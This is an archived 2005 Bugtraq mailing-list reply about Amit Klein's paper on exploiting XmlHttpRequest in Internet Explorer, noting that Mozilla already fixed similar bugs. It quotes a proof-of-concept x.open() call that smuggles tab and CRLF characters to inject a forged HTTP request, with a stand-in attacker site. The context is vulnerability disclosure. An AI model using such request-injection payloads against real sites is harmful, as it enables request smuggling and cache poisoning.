Re: "Exploiting the XmlHttpRequest object in IE" - paper by Amit Klein

From: Yutaka OIWA (y.oiwa_at_aist.go.jp)
Date: 09/27/05

  • Next message: Amon Ott: "Announce: RSBAC v1.2.5 released" 
    To: bugtraq@securityfocus.com
Date: Tue, 27 Sep 2005 21:34:11 +0900

    Hello Amit,

    "Amit Klein (AKsecurity)" <aksecurity@hotpop.com> writes:

    > x.open("GET\thttp://www.target.site/page.cgi?parameters\tHTTP
    > /1.0\r\nHost:\twww.target.site\r\nReferer:\thttp://www.target
    > .site/somepath?somequery\r\n\r\nGET\thttp://nosuchhost/\tHTTP
    > /1.0\r\nFoobar:","http://www.attacker.site/",false);

    This kind of bugs are already fixed in recent Mozilla browsers,
    as shown in your reference [4].

    > [4] "setRequestHeader can be exploited using newline characters",
    > Bugzilla bug 297078
    > https://bugzilla.mozilla.org/show_bug.cgi?id=297078 and
    > "XMLHttpRequest allows dangerous request headers to be set",
    > Bugzilla bug 302263
    > https://bugzilla.mozilla.org/show_bug.cgi?id=302263

    see comment #15 of bug 297078.

    https://bugzilla.mozilla.org/show_bug.cgi?id=297078#c15 

    -- 
Yutaka OIWA                        Research Center for Information Security
    National Institute of Advanced Industrial Science and Technology (AIST)
                      Mail addresses: <y.oiwa@aist.go.jp>, <yutaka@oiwa.jp>
OpenPGP: id[995DD3E1] fp[3C21 17D0 D953 77D3 02D7 4FEC 4754 40C1 995D D3E1]
  • Next message: Amon Ott: "Announce: RSBAC v1.2.5 released"